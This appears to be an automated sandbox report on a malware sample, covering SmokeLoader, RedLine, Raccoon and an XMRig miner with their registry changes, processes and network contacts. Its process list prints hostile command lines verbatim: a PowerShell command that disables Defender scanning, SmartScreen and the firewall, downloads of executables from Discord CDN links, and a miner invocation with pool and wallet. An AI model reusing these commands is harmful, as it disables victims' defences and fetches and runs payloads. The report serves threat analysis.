Analysis Overview
SHA256
1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8
Threat Level: Known bad
The file 1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8 was found to be: Known bad.
Malicious Activity Summary
SmokeLoader
RedLine Payload
xmrig
Modifies security service
Raccoon
RedLine
XMRig Miner Payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Executes dropped EXE
Downloads MZ/PE file
UPX packed file
Checks BIOS information in registry
Deletes itself
Reads user/profile data of web browsers
Themida packer
Loads dropped DLL
Reads user/profile data of local email clients
Drops startup file
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks whether UAC is enabled
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Program crash
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Checks SCSI registry key(s)
Suspicious behavior: MapViewOfSection
Modifies system certificate store
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-09-19 18:14
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-09-19 18:14
Reported
2021-09-19 18:16
Platform
win10-en
Max time kernel
150s
Max time network
146s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Start = "4" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Raccoon
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\48FE.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5B50.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5B50.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\fl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\2F3A.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\215E.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\2F3A.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\48FE.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\fl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\215E.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk | C:\Users\Admin\AppData\Local\Temp\fl.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3C5B.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3C5B.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3C5B.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\5B50.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\fl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\215E.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\2F3A.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\48FE.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\215E.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2F3A.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\48FE.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5B50.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fl.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4696 set thread context of 4716 | N/A | C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe | C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe |
| PID 616 set thread context of 768 | N/A | C:\Users\Admin\AppData\Local\Temp\6B21.exe | C:\Users\Admin\AppData\Local\Temp\6B21.exe |
| PID 4600 set thread context of 1136 | N/A | C:\Users\Admin\AppData\Local\Temp\6023.exe | C:\Users\Admin\AppData\Local\Temp\6023.exe |
| PID 4172 set thread context of 2644 | N/A | C:\Users\Admin\AppData\Local\Temp\199b1g.exe | C:\Users\Admin\AppData\Local\Temp\199b1g.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\199b1g.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\fl.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\fl.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\215E.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2F3A.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\3517.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\48FE.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe
"C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe"
C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe
"C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe"
C:\Users\Admin\AppData\Local\Temp\215E.exe
C:\Users\Admin\AppData\Local\Temp\215E.exe
C:\Users\Admin\AppData\Local\Temp\2F3A.exe
C:\Users\Admin\AppData\Local\Temp\2F3A.exe
C:\Users\Admin\AppData\Local\Temp\3517.exe
C:\Users\Admin\AppData\Local\Temp\3517.exe
C:\Users\Admin\AppData\Local\Temp\3C5B.exe
C:\Users\Admin\AppData\Local\Temp\3C5B.exe
C:\Users\Admin\AppData\Local\Temp\48FE.exe
C:\Users\Admin\AppData\Local\Temp\48FE.exe
C:\Users\Admin\AppData\Local\Temp\512D.exe
C:\Users\Admin\AppData\Local\Temp\512D.exe
C:\Users\Admin\AppData\Local\Temp\5B50.exe
C:\Users\Admin\AppData\Local\Temp\5B50.exe
C:\Users\Admin\AppData\Local\Temp\6023.exe
C:\Users\Admin\AppData\Local\Temp\6023.exe
C:\Users\Admin\AppData\Local\Temp\6023.exe
C:\Users\Admin\AppData\Local\Temp\6023.exe
C:\Users\Admin\AppData\Local\Temp\6B21.exe
C:\Users\Admin\AppData\Local\Temp\6B21.exe
C:\Users\Admin\AppData\Local\Temp\6B21.exe
C:\Users\Admin\AppData\Local\Temp\6B21.exe
C:\Users\Admin\AppData\Local\Temp\6023.exe
C:\Users\Admin\AppData\Local\Temp\6023.exe
C:\Users\Admin\AppData\Local\Temp\6F48.exe
C:\Users\Admin\AppData\Local\Temp\6F48.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\6FED.bat C:\Users\Admin\AppData\Local\Temp\6F48.exe"
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/880498551011049495/883407469894856764/33.exe" "33.exe" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889204878965088268/889206644829982770/PLQRfphz.exe" "PLQRfphz.exe" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe
PLQRfphz.exe
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe "" "" "" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\745A.exe
C:\Users\Admin\AppData\Local\Temp\745A.exe
C:\Users\Admin\AppData\Local\Temp\fl.exe
"C:\Users\Admin\AppData\Local\Temp\fl.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(exit)
C:\ProgramData\Systemd\dllhoster.exe
-o pool.supportxmr.com:5555 -u 44z5DkTXSYBfYECbt5TdQ2SUpyAQJmmGubyUsWqzcByeKwxwsWSZabZQMuE39hedNcTL15eK8kHrAeZMUdGGmHQHBzNH5db -p bloodteam --coin=XMR --cpu-max-threads-hint=35
C:\Users\Admin\AppData\Local\Temp\199b1g.exe
"C:\Users\Admin\AppData\Local\Temp\199b1g.exe"
C:\Users\Admin\AppData\Local\Temp\SparestPeculation_2021-09-19_16-22.exe
"C:\Users\Admin\AppData\Local\Temp\SparestPeculation_2021-09-19_16-22.exe"
C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
C:\Users\Admin\AppData\Local\Temp\199b1g.exe
"C:\Users\Admin\AppData\Local\Temp\199b1g.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 924
C:\Users\Admin\AppData\Roaming\7974777.scr
"C:\Users\Admin\AppData\Roaming\7974777.scr" /S
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | venerynnet1.top | udp |
| US | 8.8.8.8:53 | kevonahira2.top | udp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| NL | 190.2.145.108:12608 | tcp | |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| NL | 193.56.146.36:80 | 193.56.146.36 | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| US | 8.8.8.8:53 | iryarahara.xyz | udp |
| RU | 77.246.145.4:80 | iryarahara.xyz | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.9.20.20:13441 | tcp | |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | telete.in | udp |
| DE | 195.201.225.248:443 | telete.in | tcp |
| DE | 74.119.192.122:80 | 74.119.192.122 | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| DE | 74.119.192.122:80 | 74.119.192.122 | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| NL | 190.2.145.156:80 | tcp | |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| NL | 45.67.231.145:10991 | tcp | |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| NL | 45.81.225.228:10774 | tcp | |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| FI | 135.181.208.162:49195 | tcp | |
| US | 34.210.194.227:80 | tcp | |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| DE | 88.99.66.31:80 | iplogger.org | tcp |
| DE | 88.99.66.31:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.217.33.252:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 149.202.83.171:5555 | pool.supportxmr.com | tcp |
| US | 8.8.8.8:53 | dependstar.bar | udp |
| US | 172.67.160.135:443 | dependstar.bar | tcp |
| SC | 185.215.113.104:18754 | tcp | |
| DE | 88.99.66.31:443 | iplogger.org | tcp |
| DE | 88.99.66.31:443 | iplogger.org | tcp |
| RU | 91.142.77.155:5469 | tcp | |
| US | 8.8.8.8:53 | product-review-now.bar | udp |
| US | 172.67.128.27:443 | product-review-now.bar | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
Files
memory/4716-115-0x0000000000400000-0x0000000000408000-memory.dmp
memory/4716-116-0x0000000000402DCE-mapping.dmp
